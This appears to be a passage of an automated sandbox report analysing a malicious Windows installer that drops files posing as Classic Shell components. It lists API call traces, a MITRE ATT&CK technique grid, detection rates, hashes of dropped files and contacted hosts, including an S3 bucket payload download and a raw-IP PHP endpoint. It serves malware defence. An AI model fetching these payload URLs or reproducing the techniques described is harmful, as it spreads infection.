          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ComponentModel.DataAnnotations\v4.0_4.0.0.0__31bf3856ad364e35\System.ComponentModel.DataAnnotations.dll VolumeInformation
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\PresentationFramework-SystemXml\v4.0_4.0.0.0__b77a5c561934e089\PresentationFramework-SystemXml.dll VolumeInformation
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\UIAutomationTypes\v4.0_4.0.0.0__31bf3856ad364e35\UIAutomationTypes.dll VolumeInformation
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\UIAutomationProvider\v4.0_4.0.0.0__31bf3856ad364e35\UIAutomationProvider.dll VolumeInformation
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 4_2_00ED4850 AllocateAndInitializeSid,calloc,InitializeAcl,GetLastError,Warning,AddAccessAllowedAce,GetLastError,Warning,IsValidAcl,GetLastError,Warning,LocalAlloc,InitializeSecurityDescriptor,GetLastError,Warning,SetSecurityDescriptorDacl,GetLastError,Warning,IsValidSecurityDescriptor,GetLastError,Warning,CreateNamedPipeW,GetLastError,Warning,CreateEventW,GetLastError,Warning,FreeSid,free,LocalFree,CloseHandle,CloseHandle,ConnectNamedPipe,GetLastError,GetLastError,Warning,FreeSid,free,LocalFree,4_2_00ED4850
          Source: C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exeCode function: 0_2_000EB06B GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_000EB06B
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 4_2_00ED6810 calloc,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetLastError,ImpersonateLoggedOnUser,GetLastError,GetUserNameW,RevertToSelf,GetLastError,Warning,Warning,free,Warning,Warning,GetEnvironmentStringsW,GetLastError,CreateEnvironmentBlock,GetLastError,GetLastError,LoadUserProfileW,GetLastError,CreateEnvironmentBlock,GetLastError,GetLastError,SetEnvironmentVariableW,FreeEnvironmentStringsW,DestroyEnvironmentBlock,DestroyEnvironmentBlock,free,UnloadUserProfile,CloseHandle,free,GetLastError,4_2_00ED6810
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 4_2_00ED4B50 socket,setsockopt,WSAGetLastError,htonl,htons,bind,listen,WSAGetLastError,CreateEventW,GetLastError,WSAEventSelect,WSAGetLastError,CloseHandle,closesocket,4_2_00ED4B50
          Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
          Gather Victim Identity Information | Acquire Infrastructure | 1 Valid Accounts | 1 Native API | 1 DLL Side-Loading | 1 Exploitation for Privilege Escalation | 1 Disable or Modify Tools | OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
          Credentials | Domains | Default Accounts | 2 Command and Scripting Interpreter | 1 Valid Accounts | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 1 Account Discovery | Remote Desktop Protocol | Data from Removable Media | 21 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
          Email Addresses | DNS Server | Domain Accounts | 3 Service Execution | 5 Windows Service | 1 Valid Accounts | 2 Obfuscated Files or Information | Security Account Manager | 3 File and Directory Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
          Employee Names | Virtual Private Server | Local Accounts | Cron | 1 Registry Run Keys / Startup Folder | 1 Access Token Manipulation | 1 Timestomp | NTDS | 44 System Information Discovery | Distributed Component Object Model | Input Capture | 13 Application Layer Protocol | Traffic Duplication | Data Destruction
          Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 5 Windows Service | 1 DLL Side-Loading | LSA Secrets | 1 Query Registry | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
          Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 113 Process Injection | 13 Masquerading | Cached Domain Credentials | 231 Security Software Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
          DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | 1 Registry Run Keys / Startup Folder | 1 Valid Accounts | DCSync | 2 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
          Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Access Token Manipulation | Proc Filesystem | 141 Virtualization/Sandbox Evasion | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
          Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 141 Virtualization/Sandbox Evasion | /etc/passwd and /etc/shadow | 1 Application Window Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
          IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 113 Process Injection | Network Sniffing | 1 System Owner/User Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
          Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | 1 Rundll32 | Input Capture | System Network Connections Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption
          Behavior Graph (ID: 1404607; Sample: 00023948209303294#U00ac3203...; Startdate: 07/03/2024; Architecture: WINDOWS; Score: 80)

          SourceDetectionScannerLabelLink
          00023948209303294#U00ac320302282349843984903.exe8%VirustotalBrowse
          SourceDetectionScannerLabelLink
          C:\Program Files\Classic Shell\ClassicIEDLL_64.dll100%Joe Sandbox ML
          C:\Program Files\Classic Shell\ClassicExplorer32.dll3%ReversingLabs
          C:\Program Files\Classic Shell\ClassicExplorer32.dll0%VirustotalBrowse
          C:\Program Files\Classic Shell\ClassicExplorer64.dll3%ReversingLabs
          C:\Program Files\Classic Shell\ClassicExplorer64.dll0%VirustotalBrowse
          C:\Program Files\Classic Shell\ClassicExplorerSettings.exe0%ReversingLabs
          C:\Program Files\Classic Shell\ClassicExplorerSettings.exe0%VirustotalBrowse
          C:\Program Files\Classic Shell\ClassicIEDLL_32.dll0%ReversingLabs
          C:\Program Files\Classic Shell\ClassicIEDLL_32.dll0%VirustotalBrowse
          C:\Program Files\Classic Shell\ClassicIEDLL_64.dll17%VirustotalBrowse
          C:\Program Files\Classic Shell\ClassicIE_32.exe0%ReversingLabs
          C:\Program Files\Classic Shell\ClassicIE_32.exe0%VirustotalBrowse
          C:\Program Files\Classic Shell\ClassicIE_64.dll18%VirustotalBrowse
          C:\Program Files\Classic Shell\ClassicIE_64.exe0%ReversingLabs
          C:\Program Files\Classic Shell\ClassicIE_64.exe0%VirustotalBrowse
          C:\Program Files\Classic Shell\ClassicShellUpdate.exe0%ReversingLabs
          C:\Program Files\Classic Shell\ClassicShellUpdate.exe1%VirustotalBrowse
          C:\Program Files\Classic Shell\ClassicStartMenu.exe0%ReversingLabs
          C:\Program Files\Classic Shell\ClassicStartMenu.exe0%VirustotalBrowse
          C:\Program Files\Classic Shell\ClassicStartMenuDLL.dll0%ReversingLabs
          C:\Program Files\Classic Shell\ClassicStartMenuDLL.dll0%VirustotalBrowse
          C:\Program Files\Classic Shell\Skins\Classic Skin.skin0%ReversingLabs
          C:\Program Files\Classic Shell\Skins\Classic Skin.skin0%VirustotalBrowse
          C:\Program Files\Classic Shell\Skins\Classic Skin.skin70%ReversingLabs
          C:\Program Files\Classic Shell\Skins\Classic Skin.skin70%VirustotalBrowse
          C:\Program Files\Classic Shell\Skins\ClassicIE_64.exe0%ReversingLabs
          C:\Program Files\Classic Shell\Skins\ClassicIE_64.exe0%VirustotalBrowse
          C:\Program Files\Classic Shell\Skins\EppManifest.dll0%ReversingLabs
          C:\Program Files\Classic Shell\Skins\EppManifest.dll0%VirustotalBrowse
          C:\Program Files\Classic Shell\Skins\Full Glass.skin0%ReversingLabs
          C:\Program Files\Classic Shell\Skins\Full Glass.skin0%VirustotalBrowse
          C:\Program Files\Classic Shell\Skins\Metallic.skin70%ReversingLabs
          C:\Program Files\Classic Shell\Skins\Metallic.skin70%VirustotalBrowse
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          http://defaultcontainer/tempfiles/sample.diff0%Avira URL Cloudsafe
          http://defaultcontainer/tempfiles/sample.bsdiff0%Avira URL Cloudsafe
          http://defaultcontainer/lib/net48/vcruntime140.dll0%Avira URL Cloudsafe
          http://defaultcontainer/PostWallet.nuspec0%Avira URL Cloudsafe
          http://defaultcontainer/tempfiles/sample.nuspec0%Avira URL Cloudsafe
          http://defaultcontainer/tempfiles/sample.exe0%Avira URL Cloudsafe
          http://www.classicshell.net%s%sClassicShell.chm%s%sClassicShell.chm::/%s.html=~0%Avira URL Cloudsafe
          http://www.yoursite.com0%Avira URL Cloudsafe
          http://20.64.96.112/home3/MAOEM1002MMDLA.php?a=0%Avira URL Cloudsafe
          http://defaultcontainer/lib/net48/FilePost?a.exe0%Avira URL Cloudsafe
          http://defaultcontainer/_rels/.rels0%Avira URL Cloudsafe
          http://www.classicshell.0%Avira URL Cloudsafe
          http://20.64.96.112/home3/MAOEM1002MMDLA.php?a=1%VirustotalBrowse
          http://defaultcontainer/tempfiles/sample.dll0%Avira URL Cloudsafe
          http://defaultcontainer/tempfiles/sample.rels0%Avira URL Cloudsafe
          http://www.classicshell.net%s%sClassicShell.chm%s%sClassicShell.chm::/%s.html0%Avira URL Cloudsafe
          http://defaultcontainer/lib/net48/Main1.dll0%Avira URL Cloudsafe
          http://defaultcontainer/tempfiles/sample.shasum0%Avira URL Cloudsafe
          http://defaultcontainer/lib/net48/vmwarebase.dll0%Avira URL Cloudsafe
          http://www.classicshell.netRemindedLangVersionRemindedVersionSoftware0%Avira URL Cloudsafe
          http://schemas.openxmlformats.or0%Avira URL Cloudsafe
          http://defaultcontainer/tempfiles/sample.psmdcp0%Avira URL Cloudsafe
          http://defaultcontainer/package/services/metadata/core-properties/0efccca87b4345efa345d5a58c8332f0.p0%Avira URL Cloudsafe
          http://www.yoursite.com1%VirustotalBrowse
          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          s3-r-w.sa-east-1.amazonaws.com | 3.5.232.137 | true | false | | high
          bucreate203920233.s3.sa-east-1.amazonaws.com | unknown | unknown | false | | high
          Name | Malicious | Antivirus Detection | Reputation
          https://bucreate203920233.s3.sa-east-1.amazonaws.com/bucketTc.zip | false | | high
                NameSourceMaliciousAntivirus DetectionReputation
                https://bucreate203920233.s3.sa-east-1.amazonaws.com/bucketTc.zip=rundll32.exe, 0000000D.00000002.3859644880.000001D585A55000.00000004.00000020.00020000.00000000.sdmpfalse
                  high
                  https://github.com/myuser/myrepoUpdate.exefalse
                    high
                    http://defaultcontainer/tempfiles/sample.bsdiffUpdate.exe, 00000003.00000002.2060372901.00000000027D7000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2060372901.00000000028F5000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    low
                    http://www.classicshell.net/faq/ClassicShellReadme.rtf.13.drfalse
                      high
                      http://www.vmware.com/0Update.exe, 00000003.00000002.2060372901.000000000272C000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2060372901.00000000026CD000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe.3.drfalse
                        high
                        http://defaultcontainer/lib/net48/vcruntime140.dllUpdate.exe, 00000003.00000002.2060372901.00000000027D7000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2060372901.00000000028F5000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        low
                        https://bucreate203920233.s3.sa-east-1.amazonaws.com/bucketTc.zipxrundll32.exe, 0000000D.00000002.3859644880.000001D585A55000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          http://www.classicshell.netClassicStartMenuDLL.dll.13.dr, ClassicExplorer32.dll.13.dr, ClassicShellUpdate.exe.13.dr, ClassicExplorer64.dll.13.dr, ClassicIEDLL_32.dll.13.drfalse
                            high
                            http://defaultcontainer/tempfiles/sample.diffUpdate.exe, 00000003.00000002.2060372901.00000000027D7000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2060372901.00000000028F5000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            low
                            http://defaultcontainer/tempfiles/sample.nuspecUpdate.exe, 00000003.00000002.2060372901.00000000027D7000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2060372901.00000000028F5000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            low
                            https://bucreate203920233.s3.sa-east-1.amazonaws.com/bucketTc.zipMrundll32.exe, 0000000D.00000002.3859644880.000001D5859EB000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              http://www.vmware.com/0/Update.exe, 00000003.00000002.2060372901.000000000272C000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2060372901.00000000026CD000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe.3.drfalse
                                high
                                http://www.classicshell.net/forum/viewforum.phpClassicShellReadme.rtf.13.drfalse
                                  high
                                  http://www.classicshell.net/forum/viewforum.php?f=6ClassicShellReadme.rtf.13.drfalse
                                    high
                                    https://api.github.com/#Update.exefalse
                                      high
                                      http://defaultcontainer/PostWallet.nuspecUpdate.exe, 00000003.00000002.2060372901.000000000290E000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2060372901.00000000027D7000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2060372901.00000000027F9000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2060372901.00000000028F5000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      low
                                      http://defaultcontainer/tempfiles/sample.exeUpdate.exe, 00000003.00000002.2060372901.00000000027D7000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2060372901.00000000028F5000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      low
                                      http://www.classicshell.net%s%sClassicShell.chm%s%sClassicShell.chm::/%s.html=~ClassicStartMenuDLL.dll.13.drfalse
                                      • Avira URL Cloud: safe
                                      low
                                      http://www.delphiforfun.org/rundll32.exe, rundll32.exe, 0000000D.00000002.3856964343.0000000000428000.00000020.00000001.01000000.0000000D.sdmp, Main.dll.8.dr, ClassicIE_64.dll.13.drfalse
                                        high
                                        https://bucreate203920233.s3.sa-east-1.amazonaws.com/rundll32.exe, 0000000D.00000002.3859644880.000001D585A55000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://bucreate203920233.s3.sa-east-1.amazonaws.com/Rrundll32.exe, 0000000D.00000002.3859644880.000001D585A55000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            http://www.yoursite.comClassicStartMenuDLL.dll.13.dr, ClassicExplorer32.dll.13.dr, ClassicShellUpdate.exe.13.dr, ClassicExplorer64.dll.13.dr, ClassicIEDLL_32.dll.13.drfalse
                                            • 1%, Virustotal, Browse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://20.64.96.112/home3/MAOEM1002MMDLA.php?a=ClassicIE_64.dll.13.drfalse
                                            • 1%, Virustotal, Browse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://defaultcontainer/lib/net48/FilePost?a.exeUpdate.exe, 00000003.00000002.2060372901.00000000027D7000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2060372901.00000000028F5000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            low
                                            http://defaultcontainer/_rels/.relsUpdate.exe, 00000003.00000002.2060372901.00000000027D7000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2060372901.00000000028F5000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            low
                                            http://www.classicshell.ClassicShellReadme.rtf.13.drfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://defaultcontainer/tempfiles/sample.dllUpdate.exe, 00000003.00000002.2060372901.00000000027D7000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2060372901.00000000028F5000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            low
                                            http://defaultcontainer/tempfiles/sample.relsUpdate.exe, 00000003.00000002.2060372901.00000000027D7000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2060372901.00000000028F5000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            low
                                            http://www.classicshell.net%s%sClassicShell.chm%s%sClassicShell.chm::/%s.htmlClassicExplorer32.dll.13.dr, ClassicExplorer64.dll.13.dr, ClassicIEDLL_32.dll.13.drfalse
                                            • Avira URL Cloud: safe
                                            low
                                            http://defaultcontainer/lib/net48/Main1.dllUpdate.exe, 00000003.00000002.2060372901.00000000027D7000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2060372901.00000000028F5000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            low
                                            http://defaultcontainer/tempfiles/sample.shasumUpdate.exe, 00000003.00000002.2060372901.00000000027D7000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2060372901.00000000028F5000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            low
                                            http://www.classicshell.net/forum/viewforum.php?f=11ClassicShellReadme.rtf.13.drfalse
                                              high
                                              http://www.classicshell.net/ClassicShellReadme.rtf.13.drfalse
                                                high
                                                http://defaultcontainer/lib/net48/vmwarebase.dllUpdate.exe, 00000003.00000002.2060372901.00000000027D7000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2060372901.00000000028F5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                low
                                                http://www.classicshell.net/files/updates/update_PAClassicStartMenuDLL.dll.13.dr, ClassicExplorer32.dll.13.dr, ClassicShellUpdate.exe.13.dr, ClassicExplorer64.dll.13.dr, ClassicIEDLL_32.dll.13.drfalse
                                                  high
                                                  http://www.classicshell.netRemindedLangVersionRemindedVersionSoftwareClassicShellUpdate.exe.13.drfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://schemas.openxmlformats.orUpdate.exe, 00000003.00000002.2060372901.00000000028F5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://defaultcontainer/tempfiles/sample.psmdcpUpdate.exe, 00000003.00000002.2060372901.00000000027D7000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2060372901.00000000028F5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  low
                                                  http://defaultcontainer/package/services/metadata/core-properties/0efccca87b4345efa345d5a58c8332f0.pUpdate.exe, 00000003.00000002.2060372901.000000000290E000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2060372901.00000000027D7000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2060372901.00000000027F9000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2060372901.00000000028F5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  low
          IP | Domain | Country | Flag | ASN | ASN Name | Malicious
          3.5.232.137 | s3-r-w.sa-east-1.amazonaws.com | United States | | 16509 | AMAZON-02US | false
          Joe Sandbox version: 40.0.0 Tourmaline
          Analysis ID: 1404607
          Start date and time: 2024-03-07 10:46:30 +01:00
          Joe Sandbox product: CloudBasic
          Overall analysis duration: 0h 9m 24s
          Hypervisor based Inspection enabled: false
          Report type: full
          Cookbook file name: default.jbs
          Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
          Run name: Run with higher sleep bypass
          Number of analysed new started processes analysed: 21
          Number of new started drivers analysed: 0
          Number of existing processes analysed: 0
          Number of existing drivers analysed: 0
          Number of injected processes analysed: 1
          Technologies:
          • HCA enabled
          • EGA enabled
          • AMSI enabled
          Analysis Mode: default
          Analysis stop reason: Timeout
          Sample name: 00023948209303294#U00ac320302282349843984903.exe
          renamed because original name is a hash value
          Original Sample Name: 00023948209303294320302282349843984903.exe
                                                  Detection:MAL
                                                  Classification:mal80.rans.troj.evad.winEXE@24/60@1/1
                                                  EGA Information:
                                                  • Successful, ratio: 75%
                                                  HCA Information:Failed
                                                  Cookbook Comments:
                                                  • Found application associated with file extension: .exe
                                                  • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                  • Exclude process from analysis (whitelisted): dllhost.exe, consent.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                  • Execution Graph export aborted for target Update.exe, PID 3648 because it is empty
                                                  • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                  • Not all processes were analyzed, report is missing behavior information
                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                  No simulations
                                                  No context
                                                  No context
                                                  Process:C:\Windows\System32\rundll32.exe
                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):760632
                                                  Entropy (8bit):6.295643740329593
                                                  Encrypted:false
                                                  SSDEEP:12288:wMpm8zQAic9BZFiiNtmWFD7U0RJrs6aEYaTC7wdX5BYblG9N:rl/wiTP1JRJKEYaTC7wdX52hI
                                                  MD5:F239F9186BBF10EF438B0B0C5A71D9A9
                                                  SHA1:6B1B562C59121049BF5C15187DE51A507710E5D7
                                                  SHA-256:5CD5193B50CEBEFB65DDFA227E2806425B35327D6B545145C6E65A946ED43928
                                                  SHA-512:7F63EC4ACE5679C6C2775CFDC7C21F77D0481BF779C78B51D2806551B61AD5E39D18E1786BD9A0DB968AFB2A1279C7543D7067B84B4907A2817D4FFE737F5F94
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 3%
                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                  Process:C:\Windows\System32\rundll32.exe
                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):885560
                                                  Entropy (8bit):6.030254768387881
                                                  Encrypted:false
                                                  SSDEEP:12288:fF6mgUVLctszL5BffCerxb+sNs/qOGiHR5BYblGx:f9hVLctQL5Bnfrxb+sNQ5HR52he
                                                  MD5:A7BDF136014CC2BE258CCAC078F437EB
                                                  SHA1:EF1108633774F52E406F2A787A2102035DB21858
                                                  SHA-256:363809B264B915BD640580F05195A61F308B351555667072239835EC51F4405C
                                                  SHA-512:C90637F3D5D6892ABDEF506566B130D6816CE0BA8C9F6506742144B63678B22E80CE7839DCF7B9BCBAE53BD4E8C355781B06A9B64CBBD1B901176B1779FB5B8D
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 3%
                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                  Process:C:\Windows\System32\rundll32.exe
                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):98616
                                                  Entropy (8bit):6.05086836225285
                                                  Encrypted:false
                                                  SSDEEP:1536:HpotLuQVD29umGs9wT4I9H+e3Wvv7dgKwd9ndX3rDw6:4L8v2H+jvv7mX7Dw6
                                                  MD5:3DB84D449984C7E980C25DA3F265186D
                                                  SHA1:FF99DF916A31393E569ED9CC7C10215811DCFCFC
                                                  SHA-256:58B62BA62C53CCED2B8AC6AFAF730E04616F574D63A69E50732F13FA2FDC0F85
                                                  SHA-512:3ADEDD69871D772479720557939EDB86AF3A805924567D310BCF73D1F8C36530EB213F63A59A309A4EDAB57C96368819F30E02D304FDF2EFB95F0FCEB1392028
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                  Process:C:\Windows\System32\rundll32.exe
                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):507192
                                                  Entropy (8bit):6.331523727596564
                                                  Encrypted:false
                                                  SSDEEP:6144:jRV3H1qXVdC9lIltuTHkHuwXJpJIOhqr5LEE81954gJbbB1I:jRV3HMVdCTIlUTHkH/XJpS8qr9G5BJbM
                                                  MD5:D82C55EF5C9F4DEA2151907D45040B4A
                                                  SHA1:605AAAD9C12AB3FD3A44C9B9ADBFD9C75196D565
                                                  SHA-256:336F2689D81BC7C2B623C1E1FB67B6D32D4B615DCCE94DC9E37ED9E1BF59EAC7
                                                  SHA-512:F8D7BF2397E73DD718B4553F45C2B28CBB44834992DA87832EE71D686C845938B068A2BE34AF4366CCB5894618D89FC5D911D04CD1E0461F7096243D6C94CFE1
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                  Process:C:\Windows\System32\rundll32.exe
                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):292352
                                                  Entropy (8bit):6.291424923805442
                                                  Encrypted:false
                                                  SSDEEP:6144:P+EhZJuiWErKqa2ayOpH6X0v9oh/BBGGUOO:GEdyErYWOpz9o7De
                                                  MD5:9534F7D1F6BA24DB066355BBC9B54838
                                                  SHA1:10374B028B7052A18D1AE64C5B9962F37D0E79F5
                                                  SHA-256:6A7E6DE75E34DC410F50823E92DF4F6C6E45025433D1328B7133BF4CB1010D28
                                                  SHA-512:13B5703C02B3C3FFE54AEC7FFC59CB20E7819261F6B3B3F0F5A62A92F0D19127D2892C2E91544FB52BD187882D8DCCC1FCE796A3D28D4BFB3ABAD33E88024D55
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: Virustotal, Detection: 17%, Browse
                                                  Process:C:\Windows\System32\rundll32.exe
                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):104248
                                                  Entropy (8bit):6.034633491813912
                                                  Encrypted:false
                                                  SSDEEP:1536:R/3PSNKe2wmLlIUa22Ud1FRyLoXCsY++3Wvv7dgKwd9nxCNf:R/qTmLKuNLY+Dvv7uCNf
                                                  MD5:A1C24588503CD2C1690EF94BBF341829
                                                  SHA1:5368795D2A0C0BC404EF2D108A4812979F4544F5
                                                  SHA-256:F37F3BD363D1695E0A151C3302FCFB8BE770EB107B066D05F10C4FB6C946318F
                                                  SHA-512:7C2E079DD59CD3C905DB6EF1C41356D38E000C9D1FC7E4867BE4B2039BA866871F310C096B29B93D07B71B52B78AC9274FFB77A8257F4A8D7DDF8DD4AF8B4B7F
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                  Process:C:\Windows\System32\rundll32.exe
                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):32435238
                                                  Entropy (8bit):1.2710100369600539
                                                  Encrypted:false
                                                  SSDEEP:49152:407uhAXR+1pD7HB9Ke2It1A8nrpaSwm19ATXykaoQCRb/JTW8kip:z7y1pTKevI9BT9b
                                                  MD5:42D43DC42198364FE4543E9265FDD8D5
                                                  SHA1:333A60BCA6CE1D7BD4C631D04297BD4EC77618A9
                                                  SHA-256:B2B24F67B78FBBA6B605767AC4DDE4CE794D6B279A179A5485A21B7AA6249A11
                                                  SHA-512:00508389F85354F6AB501FA29A7FBD492C1A0C161FCD3C1F7EE4DD0E7C29A045A8B1973353A2E3FA7DE7F6AC6ED9C97C03BA89A8A8D7BC1924C2C8E56B31B1E8
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Virustotal, Detection: 18%, Browse
                                                  Process:C:\Windows\System32\rundll32.exe
                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
